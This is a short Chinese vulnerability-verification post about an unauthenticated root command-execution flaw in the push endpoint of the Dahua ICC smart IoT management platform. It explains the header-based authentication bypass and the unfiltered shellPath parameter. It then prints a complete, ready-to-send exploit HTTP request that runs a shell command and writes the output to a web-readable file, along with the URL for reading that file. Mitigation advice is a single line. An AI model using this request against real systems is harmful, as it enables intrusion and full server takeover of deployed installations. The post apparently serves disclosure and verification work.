漏洞验证-大华ICC智能物联管理平台 push 存在命令执行漏洞
一、漏洞描述
大华ICC智能物联综合管理平台的/evo-runs/v1.0/push接口存在高危命令执行漏洞,攻击者可通过构造特殊请求绕过鉴权机制,直接以root权限在目标服务器上执行任意系统命令123。该漏洞影响广泛部署于智能园区、商业综合体等场景的大华智能物联管理平台。
漏洞源于平台对push和receive接口的鉴权缺陷:
-
当请求头中包含
X-Subject-Headerflag: ADAPT时,系统会跳过正常鉴权流程 -
接口处理用户输入时未做充分过滤,直接将
shellPath参数内容传递给Runtime.getRuntime().exec()执行 -
命令执行权限为root,但存在部分限制(如命令中不能包含空格)
二、POC
POST /evo-runs/v1.0/push HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0
Content-Type: application/json
X-Subject-Headerflag: ADAPT
Content-Length: 258
{
"method": "agent.ossm.mapping.config",
"info": {
"configure": "abcd",
"filePath": "haha",
"paramMap": {
"shellPath": "/bin/bash -c id>/opt/evoWpms/static/xxx.txt",
"filePath": "abc"
},
"requestIp": ""
}
}
https://target.com/static/xxx.txt
三、验证截图

四、修复建议
请联系厂商安装补丁或使用防护设备进行拦截。
浙公网安备 33010602011771号